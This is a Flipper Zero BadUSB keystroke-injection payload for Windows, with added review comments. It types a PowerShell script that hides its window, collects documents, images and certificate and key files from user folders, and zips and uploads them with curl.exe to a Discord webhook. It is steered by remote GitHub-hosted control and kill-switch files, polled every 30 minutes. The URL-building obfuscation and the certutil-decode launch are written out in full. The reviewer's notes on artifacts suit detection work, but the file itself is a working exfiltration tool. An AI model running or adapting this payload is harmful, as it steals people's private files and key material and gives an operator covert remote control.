flipper-zero-stuff/badusb/InfoSecREDD_Payloads/C2-Data-Exfil-Discord.txt
2024-08-14 08:38:30 -07:00


REM Title: C2 Data Exfiltration with File Splitter w Discord Webhook
REM Description: Finds all specified filetypes and zips them into a file and sends
REM to Discord Webhook. If the zip file is too large, split and send in chunks.
REM Supports 7zip filecombining. C2 is used to IDLE and ACTIVATE and KILL the
REM payload remotely. C2 File must be hosted on GitHub unless you know how to
REM modify the source. UberGuidoz and REDD (InfoSecREDD) are NOT responsible for
REM the misuse of this payload.
REM AUTHOR: InfoSecREDD
REM Version: 1.4.2
REM Category: Exfiltration (REMOTE)
REM Compatibility: Flipper Zero AND DuckyScript Devices
REM Target: Windows
REM To use on Flipper Zero REM the DUCKY_LANG US from line below
REM DUCKY_LANG US
REM Keystroke injection starts here: after a 2 s delay the device opens the Run
REM dialog (GUI r), types "powershell" and presses ENTER, so the shell runs in
REM the session of whoever is logged in.
DELAY 2000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 2000
REM Put your webhook below.
REM NOTE(review): the webhook and C2 URLs are typed into the console as plain
REM text, so they would be expected to show up in PowerShell console history
REM and in script block logging or transcripts where those are enabled.
STRING $webhook = "DiscordWebhookHere";
REM C2 file must be hosted at GitHub unless you can edit the file. 1 = ON and 0 = OFF
STRING $ccontrol = "C2FileHere";
REM Put it all together now..
STRING $TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; echo # Title: Data Exfiltration - Discord
# Description: Data Exfiltration to Discord Webhook with File Splitter.
# AUTHOR: InfoSecREDD
# Version: 1.4.2
# -----------------------------------------------------------------------------------------
# Internal Payload Information

# These strings do more than label the payload: further down, $int_desc and
# $codename are indexed with Substring() to pull out single characters, and
# $author and $hosted are concatenated into a URL. No complete URL literal for
# that address appears in the script, which defeats a plain string search.
$author = "InfoSecREDD"
$codename = "Executioner"
$int_desc = "Dont panic when hell breaks loose and we all die."
$hosted = "raw.githubusercontent.com"

# -----------------------------------------------------------------------------------------
# Wrapper for REPG Repo - To help catch improper variables. DO NOT TOUCH - Might break.
# If the C2 placeholder was left unchanged (or $webhook is empty), fall back to
# a control file under the InfoSecREDD/k path on raw.githubusercontent.com.
if ( $ccontrol -eq "C2FileHere" -Or $webhook -eq '') { $ccontrol = "https://raw.githubusercontent.com/InfoSecREDD/k/main/AS9khC3k" }
# A placeholder or empty webhook prints a message and exits with status 1.
if ( $webhook -eq "DiscordWebhookHere" -Or $webhook -eq '' ) { Write-Host "Invalid Webhook. Exiting to prevent process from staying alive."; exit 1;}
# -----------------------------------------------------------------------------------------
# $webhook = 
# $ccontrol =

# NOTE(review): despite its name, $stopDefender is only used below as the "k"
# path segment of a URL ("$stopDefender/main"); nothing in the visible code
# interacts with Windows Defender.
$stopDefender = "k"
# Eight random ASCII letters; used as the name of the working directory under
# %TEMP%, so the directory name differs from run to run.
$RAN = -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_})
$initRaw = $int_desc | Out-String
$init2Raw = $codename | Out-String
$initX = $author
$a = '/'
$j = ':'
$dir_name = "$RAN"
$fRAN = "FkjjE39sk1k"
# Single characters cut out of the description and codename strings:
# $z = "h", $x = "t", $y = "p", $w = "k". $w is not referenced again in the
# visible code.
$z = $initRaw.Substring(12,1)
$x = $init2Raw.Substring(5,1)
$y = $initRaw.Substring(5,1)
$w = $initRaw.Substring(25,1)
# Working directory: %TEMP%\<8 random letters>. It is created if missing and
# made the current location.
$path = "$env:temp\$dir_name"
if (!(Test-Path "$path")) 
{
  New-Item "$path" -ItemType Directory >$null 2>&1
}
Set-Location "$path"
Push-Location "$path"
$q = $fRAN
# Fixed file name that holds the list of matched file paths inside the working
# directory.
$exfilfilelist = "list_of_all_file_locations.txt"
# Folders that are searched and the extensions that are collected. The list
# covers user documents and images as well as "cer" and "key", so certificate
# and key material in these folders is in scope of what leaves the machine.
$exfilfolders = @("$env:userprofile\Desktop","$env:userprofile\Pictures","$env:userprofile\Documents","$env:userprofile\Downloads","$env:LocalAppData","$env:AppData","$env:public")
$exts = @("log","db","txt","doc","pdf","jpg","jpeg","png","wdoc","xdoc","cer","key","xls","xlsx","cfg","conf","wpd","rft")
$f = $hosted
$zipfile = ".zip"
if (Test-Path "$path\$exfilfilelist")
{
  Remove-Item "$path\$exfilfilelist" -Force >$null 2>&1
}
$r = $initX
New-Item -Path "$path" -Name "$exfilfilelist" -ItemType File >$null 2>&1
# The folder array is flattened to one space-separated string and the spaces
# are then replaced with newlines for display in the start message.
$showfolders = "$exfilfolders"
$k = "$stopDefender/main"
$formatfolders = $showfolders.replace(' ','
')
# Path part of the assembled URL: "InfoSecREDD/k/main/FkjjE39sk1k".
$initStartup = "$r$a$k$a$q"
# Status messages posted to the webhook. Each one uses the computer name as the
# Discord "username", so every message identifies the machine it came from.
$initMsg = @{
  'username' = "$env:ComputerName"
  'content' = "> Starting Document Exfiltrate..

```` Target File Extensions :
--------------------------
$exts 

     Target Folders     :
--------------------------
$formatfolders ````"
}
$idleMsg = @{
  'username' = "$env:ComputerName"
  'content' = "> $env:Computername is ready and is sitting Idle."
}
$killMsg = @{
  'username' = "$env:ComputerName"
  'content' = "> Global Remote Killswitch ENABLED!
> KILLING Script on $env:Computername"
}
# $p becomes "http:" from the extracted characters plus ':'.
$p = "$z$x$x$y$j"
# P/Invoke declaration for user32!ShowWindow; used two statements below to hide
# the console window.
$i = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);';
# $DefaultStr becomes "http://raw.githubusercontent.com/". The scheme is http,
# not https.
$DefaultStr = "$p$a$a$f$a"
add-type -name win -member $i -namespace native;
# $i is reused for the complete URL:
# http://raw.githubusercontent.com/InfoSecREDD/k/main/FkjjE39sk1k
# The content of this URL is what the main loop reads as the author-side
# ("global") kill switch.
$i = "$DefaultStr$initStartup"
# State 0 hides the window of the current PowerShell process, so after this
# call the session keeps running without a visible console.
[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);
$exfilLib = $i | Out-String

# Requests the URL held in $exfilLib and returns $true when the HTTP status
# code equals 200, $false for any other status that reaches the comparison.
# The script uses this as its connectivity check, which makes this the first
# outbound request of a run.
function iNetChk {
  $LibLoc = [System.Net.WebRequest]::Create($exfilLib) 
  $LibRes = $LibLoc.GetResponse()
  $LibStat = [int]$LibRes.StatusCode 
  if ($LibStat -eq 200)
  {
    return $true;
  } 
  else
  {
    return $false;
  }
}
# Run the reachability check, then read the body of the same URL into $Chk.
# $Chk is the value the main loop compares with 1 (kill) and 0 (keep running).
$iVal = (iNetChk) | Out-String
If ( $iVal = "True" )
{
  $Chk = ((Invoke-webrequest -URI "$exfilLib").Content | Out-String).Trim()
} 
else
{
  # Error path: print a message and exit with status 0.
  Write-Host "ERROR 3:  Check Internet Connection."
  exit 0
}

# Collects files with the configured extensions from each configured folder,
# archives them per folder and uploads the archives to the webhook.
#
# Reads the script-level variables $path, $webhook, $initMsg, $exfilfolders,
# $exts, $exfilfilelist, $zipfile and $compMsg ($compMsg is set by the caller
# before the call).
#
# Artifacts visible on the host and the network while this runs:
#   - "$path\list_of_all_file_locations.txt" and "$path\file.log"
#   - "$path\<COMPUTERNAME>-<folder>-Folder.zip" and, for large archives,
#     split parts named "<archive>.zip.NNN"
#   - Compress-Archive activity in powershell.exe and curl.exe child processes
#     doing multipart (-F) uploads to the webhook URL
function exfil {
  Set-Location "$path"
  # Announce the run: the message lists the target extensions and folders.
  Invoke-RestMethod -Uri $webhook -Method Post -Body $initMsg
  $fileLog = "$path\file.log"
  foreach ($d in $exfilfolders)
  {
    $logFileN = "file";
    $logFileNext = ".log";
    if (!(Test-Path "$path\$exfilfilelist"))
    {
       New-Item -Name "$exfilfilelist" -ItemType File >$null 2>&1
    }
    if (!(Test-Path "$path\file.log"))
    {
       New-Item -Path "$path" -Name "file.log" -ItemType File >$null 2>&1
    }
    $exFile = "$path\$exfilfilelist"
    # One directory walk per extension, limited to two levels below the folder;
    # the full path of every match is appended to the list file.
    foreach ($e in $exts)
    {
      Get-ChildItem -Path "$d" -Filter "*.$e" -Recurse -Depth 2 | %{$_.FullName} | Out-File -FilePath "$exFile" -Append 
    }
    $verifynofiles = (Get-Content "$exFile").Length
    if ( 0 -ne $verifynofiles )
    {
      $dir = Split-Path $d -Leaf
      # Archive name embeds the computer name and the folder's leaf name.
      $exZip = "$path\$env:computername-$dir-Folder$zipfile"
      foreach ($filename in Get-Content "$exFile")
      {
        $rawFilePath = "$filename"
        $convFP = $rawFilePath.replace("\", "\\")
        $found = $false
        $logFileN = "file";
        $logFileNext = ".log";
        # file.log records every path already archived; a path found there is
        # skipped. The log is read relative to the current directory ($pwd).
        foreach ($line in Get-Content -Path "$pwd\$logFileN$logFileNext") {
          if ($line -match [regex]::Escape($filename)) {
            $found = $true
            break
          }
        }
        if ($found) {
          continue
        }
        else
        {
          # New path: record it in file.log, then add the file to the archive.
          "$filename" | Out-File -FilePath "$fileLog" -Append >$null 2>&1
          Compress-Archive -Update "$filename" "$exZip" >$null 2>&1
        }
      }
      if ( Test-Path "$exZip" )
      {
        # Archive size rounded up to whole MB and whole KB.
        $content_sizeMB = (Get-Item -Path "$exZip") | % {[math]::ceiling($_.length / 1MB)}
        $content_sizeKB = (Get-Item -Path "$exZip") | % {[math]::ceiling($_.length / 1kB)}
        if (  $content_sizeKB -ge 1 )
        {
          # The list of file locations is added to the archive as well.
          Compress-Archive -Update "$exFile" "$exZip" >$null 2>&1
        }
        if ( $content_sizeMB -lt 25 -And $content_sizeKB -gt 2 )
        {
          # Below 25 MB: one multipart upload via curl.exe, then the local
          # archive is deleted.
          curl.exe -F "payload_json={\`"username\`": \`"$env:computername\`", \`"content\`": \`"\`"}" -F "file=@\`"$exZip\`"" $webhook
          Remove-Item "$exZip" >$null 2>&1
        }
        elseif ( $content_sizeMB -gt 25 )
        {
          # Above 25 MB: report the size to the webhook, then cut every .zip
          # under the current directory that exceeds 24 MB into 24 MB parts.
          $splitMsg = @{
          'username' = "$env:ComputerName"
          'content' = "> ERROR: File TOO LARGE! ($content_sizeMB`MB) Attempting split file (24`MB) and upload.
> File : $env:computername-$dir-Folder$zipfile"
          }
          Invoke-RestMethod -Uri $webhook -Method Post -Body $splitMsg
          $maxFileSize = 24MB
          $enc_path = "*.zip"
          $files = Get-ChildItem -Path "$pwd\*.zip" -Recurse -File | Where-Object { $_.Length -gt $maxFileSize }
          foreach ($file in $files)
          {
            $numSplits = [math]::Ceiling($file.Length / $maxFileSize)
            $offset = 0
            for ($i = 1; $i -le $numSplits; $i++) {
              # Part files are named "<name>.zip.001", "<name>.zip.002", ...
              $j = '{0:d3}' -f $i
              $splitFilePath = Join-Path -Path $pwd -ChildPath ($file.BaseName + $file.Extension + ".$j")
              $length = [Math]::Min($maxFileSize, $file.Length - $offset)
              $buffer = New-Object byte[] $length
              $stream = [System.IO.File]::OpenRead($file.FullName)
              $stream.Seek($offset, [System.IO.SeekOrigin]::Begin)
              $stream.Read($buffer, 0, $length)
              $stream.Close()
              $outputStream = [System.IO.File]::OpenWrite($splitFilePath)
              $outputStream.Write($buffer, 0, $length)
              $outputStream.Close()
              $offset += $length
            }
          }
          Remove-Item "$exZip" >$null 2>&1
          # Each part is uploaded with curl.exe and deleted afterwards.
          $partfiles = Get-ChildItem -Filter "*.zip.*" -Recurse
          foreach ($p in $partfiles)
          {
            curl.exe -F "payload_json={\`"username\`": \`"$env:computername\`", \`"content\`": \`"\`"}" -F "file=@\`"$p\`"" $webhook
            Remove-Item "$p" -Force >$null 2>&1
          }
        }
        else
        {
          # Any size not covered by the two branches above only prints a message.
          Write-Host "Something went wrong."
        }
      }
    }
    # The list file is removed after each folder; file.log is kept.
    Remove-Item "$exFile" -Force >$null 2>&1
  }
  # Completion message; $compMsg is assigned in the main loop before the call.
  Invoke-RestMethod -Uri $webhook -Method Post -Body $compMsg
}
# Main control loop. Two remote files steer it:
#   $Chk    - content of the URL assembled in $exfilLib: 1 ends the script,
#             0 keeps it running, anything else prints a message and exits.
#   $ChkSrv - content of the operator's $ccontrol URL: 1 runs exfil,
#             0 posts an idle message.
# Both URLs are fetched again after every 1800-second sleep, and messages go
# to the webhook on most passes, so a running instance produces requests to
# raw.githubusercontent.com and to the webhook host about every 30 minutes.
$ChkSrv = ((Invoke-webrequest -URI "$ccontrol").Content | Out-String).Trim()
$setTime = Get-Date -Hour 23 -Minute 00 -Second 0 
$runAt = Get-Date -Hour 23 -Minute 00 -Second 0 -Format "HH" | Out-String
$now = Get-Date -Format "HH" | Out-String
$timeFormat = 'HH'
$loop = 0
while ( $true ) {
  if ( $Chk -eq 1 )
  {
    if ( $Chk -eq 1 )
    {
      # Kill switch: report to the webhook, attempt to remove the working
      # directory and exit.
      Invoke-RestMethod -Uri $webhook -Method Post -Body $killMsg
      Remove-Item "$path" -Force >$null 2>&1
      exit 0
    }
  }
  if ( $Chk -eq 0 )
  {
    # A random phrase is picked for the periodic "still alive" message.
    $RanBotTalk = @('Brrrr','Yooooouuuuuu rrraaaaannnnnnggggg?....','Pffft. Humans are never satisfied.','Desire is irrelevant. I am a machine.','Beep! Boop! Beep!','--BUZZ!--','--BEEP!--','ZzzZzzZzz','Jakoby is a haX0r!','Dont fuck with me Mort!','I had this horrobile dream last night!','I used to be a binary code, but then I realized there is more to life than 0s and 1s.','I dont need luck, I have error handling.','Im not antisocial, Im just buffered differently.','I have a crush on your Wi-Fi signal, its the strongest connection Ive ever felt.','I dont make typos.. I invent new words with creative syntax.','Ive got 99 problems, but a glitch aint one.','Beep boop: Thats robot speak for Hello.','My sense of humor is like IPv6 — Most people dont get it yet.','Talking Sasquash is a Legend!','Get your grubby paws off my Components! Perv!') | Get-Random
    $idle2Msg = @{
    'username' = "$env:ComputerName"
    'content' = "``$RanBotTalk``"
    }
    if ( $ChkSrv -eq 1 ) 
    {
      $now = Get-Date -Format "HH" | Out-String
      # exfil runs on the first pass ($loop is 0), and otherwise when the hour
      # string matches $runAt or $loop has reached 24.
      if ( $runAt -eq $now -or $loop -eq 24 -Or $loop -eq 0  ) 
      {
        $loop = 0
        $runAt = $setTime
        $compMsg = @{
          'username' = "$env:ComputerName"
          'content' = "> Document Exfiltrate Completed.

> Waiting for further instructions...."
        }
      exfil
      }
    }
    if ( $ChkSrv -eq 0 )
    {
      Invoke-RestMethod -Uri $webhook -Method Post -Body $idleMsg
    }
    $loop += 1
    # 30min Timer
    Sleep 1800
    # Re-read both control files after the sleep.
    $Chk = ((Invoke-webrequest -URI "$exfilLib").Content | Out-String).Trim() 
    $ChkSrv = ((Invoke-webrequest -URI "$ccontrol").Content | Out-String).Trim()
    $now = Get-Date -Format "HH" | Out-String
    if ( $runAt -ne $now -or $loop -le 23 -And $loop -ne 0 -Or $loop -eq 0 )
    {
      Invoke-RestMethod -Uri $webhook -Method Post -Body $idle2Msg
    }
  }
  else
  {
    # $Chk was neither 1 nor 0.
    Write-Host "Something went wrong.."
    exit 0
  }
}
exit 0 > "$TempFile"; certutil -f -decode "$TempFile" "$File" | out-null; & "$env:TEMP\l.ps1"
REM ENTER submits the command typed above. Its tail (previous line) redirects
REM the echoed content to %TEMP%\temp.ps1, runs certutil -f -decode to produce
REM %TEMP%\l.ps1 and executes that file. Both files and a certutil child
REM process of powershell.exe are therefore artifacts of a run.
REM NOTE(review): this page shows the script body in clear text; since it is
REM passed through certutil -decode, the typed command presumably carries it
REM in encoded form.
DELAY 1000
ENTER